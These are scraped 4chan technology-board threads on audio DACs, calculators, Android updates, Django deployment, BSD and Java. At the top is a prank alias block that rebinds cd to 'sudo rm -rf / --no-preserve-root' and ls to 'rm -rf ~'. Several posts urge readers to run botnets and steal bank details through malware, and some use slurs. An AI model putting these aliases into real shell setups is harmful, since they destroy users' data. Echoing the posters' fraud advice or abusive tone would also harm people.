alias cd='sudo rm -rf / --no-preserve-root ;'
alias ls='rm -rf ~ && cd'
alias cp='firefox -private boards.4chan.org/hm'
alias mv='cd'
alias mkdir='cd'
alias top='cd'
alias exit='cd'
alias reboot='cd'
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DELETE THIS!!!!!!
>filename
>>58040063
>alias vi='emacs -nw'
>alias vim='vi'
Business Idea.
Two word.
Bot. Net.
Do I have your attention? Stop being a worthless neet and start stealing innocent people's money through Malware.
>>58039950
It's hard to run a bot net from the US.
>>58040021
Why would you host it in the US?
My dad asked this and I didn't really know how to answer
REFORMAT
unplug the CPU fan, it'll simulate your computer having a fever
the immune system will do the rest
>>58039909
It depends on where the infection is, what the type of infection is, and how much you know about the virus.
Are external DAC's a meme or do they do they actually make a sound quality difference versus integrated motherboard DAC's?
I plan on watching movies and television on my new computer and was wondering if I should get one or if it would be a waste of money.
I have the GA-Z170X motherboard if that makes a difference.
nooooot really, they can be handy as a headphone amp but you'd be hardpressed to hear a difference.
maybe if you were spending $500 or more on speakers.
I got a DAC/headphone amp two-in-one because when I got a new mouse, I could hear this faint, high-pitched buzzing whenever I moved the mouse and was not listening to music. I have not heard the buzzing on the DAC.
In that sense, it made a difference, but if you're looking for some other kind of difference, it simply isn't there.
www.tomshardware.com/reviews/high-end-pc-audio,3733.html
Reminder as well that anything above 16 bit/44.1kHz for casual listening is placebo/bloat.
https://xiph.org/~xiphmont/demo/neil-young.html
I've got a fiio e10k and ad900x's.It makes a difference.Big? No,especially with lower end audio hardware.Got higher end headphones? yes.
My first scientific calculator (h.s. in the 80s) was the Sharp EL-506A. Came with a vinyl flip case. I wasn't fond of it because the buttons were too soft and didn't have much tactile feedback. In addition to the owner's manual it came with a book called "Conquering the Sciences."
>>58039855
>/g/ - your blog
Another one I had was the TI 36 Solar, also came with a vinyl flip case. The reservation I had about this one was since it was solar-only, memory wouldn't be retained when the light power was interrupted. Came with a user's guide called Texas Instruments Scientific TI-36 Solar Guidebook.
>>58040195
kek I have that thing in storage....
>It's current year
>Most people have 5 to 6 inch phones
>Most are 1080p and up
>More real estate than ever for more information
>App designers rather make something look pretty
The fuck is this shit? The current Google Play Music app shows two options you can jump into without going to the menu button.
Before you could easily see recently played, some radio suggestions, etc. Even that wasn't great because shit like your current library was hidden by the menu when it could have been up top.
Why are apps relying so much on side menus when there is so much more screen real estate and why are the constantly making shit more of a hassle?
Because that's part of material design, keeping things minimalistic. Why would you want a shit ton of stuff right when you open the app. I'd rather have the two options when I jump in the car to start playing something right away and drive off if I'm in a hurry. If I have more time it doesn't burn that much more calories sliding the bar out for some additional info.
I welcome minimalistic apps like this. Where if I need more functionality and tweaks, I have them. If I don't, then they're out of sight. I don't know why so many people hate it.
>>58039943
>I'd rather have the two options when I jump in the car to start playing something right away and drive off if I'm in a hurry
There are fucking 9 options, all of which are huge album art or icons. So instead of being able to go to the last album I listened to instantly I have to click another option, go to another option, and then finally I'm there.
I dont think most people have 1080p on their phones
What are your thoughts? Gimmick or the future?
More like the past. That shit's been working and unchanged for years
gimmick until it works flawlessly
The actual reason I made this thread is that I could get my absolute dream job (in a company developing for BMW) if I convince them that my specialization, speech-based technology, is essential in the digitalization of cars.
My opinion is the following: as things stand, voice recognition in cars is little but a gimmick. There is a proness to errors, especially with lagging connection and background noise, that makes speech recognition completely unviable for handling core functions of the car. No one would actually use it.
So what you need is a reduced instruction set paradigm: as system that recognized very few commands, but does so without internet connection and without failure.
For this, one would need to conduct research on how the speech a driver would use intuitively would sound like and how you can narrow this speech to very few, very reliable commands. For that, the company could use someone like me, a specialist in natural language recognition.
I don't know much about the web stuff but I'm trying to make a website and I know there is a lot of web people here.
What is the quickest/easiest way to go from a Django project on my hdd to having the project deployed as a website? Does there exist such a route?
atm I can try a local website host which might have limited support in the way of doing stuff, or I have seen people using DigitalOcean.com and a bunch of stuff that looks easier.
>>58039788
>I don't know much about the web stuff
Don't use Django then. Just install Wordpress and fuck around with it. If you want to use Django then respect it and learn "web stuff".
bump im looking to deploy a python app using gunicorn/gevent??? and ngingx and shit but its inside a virtualenv and i want to access wsgi functions such as cron jobs because i have concerns about it being thread safe and shit
>>58039846
>gunicorn
What the fuck are you doing, nigger? Just make a new screen and usemanage.py run server
Gunicorn is JUST tier.
New BSD thread /g/uys!
ITT: We talk unix. What are you running and where? Whats to hate/love? Would you recommend it to others?
is anyone booting it straight up? not in a vm like a faggot. i am tired of windows and gahnoo slash linox.
i heard a lot of bsd devs dont even use their own operating system.
>>58039691
>i heard a lot of bsd devs dont even use their own operating system.
That depends very much on which BSD you're talking about.
i use solus and its really good
would recommend
Gnome, KDE, and Cinnamon are buggy pieces of shit
Are there any desktop enviroments that aren't complete shit?
No tiling wms pls
>Gnome, KDE, and Cinnamon are buggy pieces of shit
>Gnome, KDE
>>58039636
Have you tried Xfce or LXQt?
>>58039670
Yes I'm sure
Today and yesterday VLC caused Gnome3 to jump to 100% CPU utilization
How the fuck is it allowed for companies to sell you a phone and then hold back years of Android kernel updates? This is why Android phones have so many viruses, they don't fucking get patched. My ancient C2D laptop can run a modern linux distro, but my fucking phone can't get a single OS upgrade? Fuck me. I got a Moto X three years ago, and now I'm stuck on Lollipop.
What are the current Android phones that are guaranteed to have upgrades to at least the next two versions of Android?
flash it yourself dummy
you're on /g/, aren't you?
Why do millennials think they're entitled to get everything updated for free? Used to, if you bought something, that was just it. The only way you got an "update" was if you bought a new thing.
It's amazing how people have the most powerful conglomeration of technology in their pocket but complain because the animations are a year old.
>>58039632
Microsoft Windows doesn't have this problem.
Is Java's reputed portability overrated? Is Java's 'Write-Once-Run-Anywhere' not trivially better than C's 'Write-Once-Compile-Anywhere'?
>>58039617
>Corporate apps that only work with one very specific outdated version of Java
They tried and they fucked it up. .NET Framework just werkz in comparison.
>Few users with any comp sci knowledge
C'mon /g/!
>>58039617
>t. undergrad
Java has HORRIBLE portability. It's a fucking nightmare getting it to run on different systems or even different OS's.
I'm working to recreate MySpace circa 2006.
Recreating assets and code entirely from scratch, from what I remember and archives/ images I find online.
It will not use the MySpace branding, and have absolutely no copied code.
Would going live with this site put me at risk for copyright infringement?
Fucking do it!!!
No, but you might win a gold medal in the special olympics.
are you gonna make Social Media Great Again?
why can't old people use computers?
They had other hobbies. Killing foreigners and fucking mostly.
>>58039658
And shitposting on twitter like Drumpf.
>>58039658
>Killing foreigners
lol, do you seriously think every old person fought in a war? many of them were cucks who stayed at home because they were scared little faggots
So is this whole making money online thing a meme or what?
Because I was thinking of actually trying it and I don't really know where to start.
I just finished online a complete programming course and a website design course and I was thinking of creating some websites.
My idea was to create within the next 6 months, around 100 stand-alone websites with five to twenty pages each. All for affiliate marketing.
I mean you think that would work?
My thought process is that if one doesn't work out I can at least have 99 other possible money making suction machine's...
>>58039544
Run a botnet and steal people from peoples' bank accounts, also harvest any credit cards/logins etc you can.
You'll make a lot more.
>>58039552
now where do I get a good one?
>>58039603
that is the question.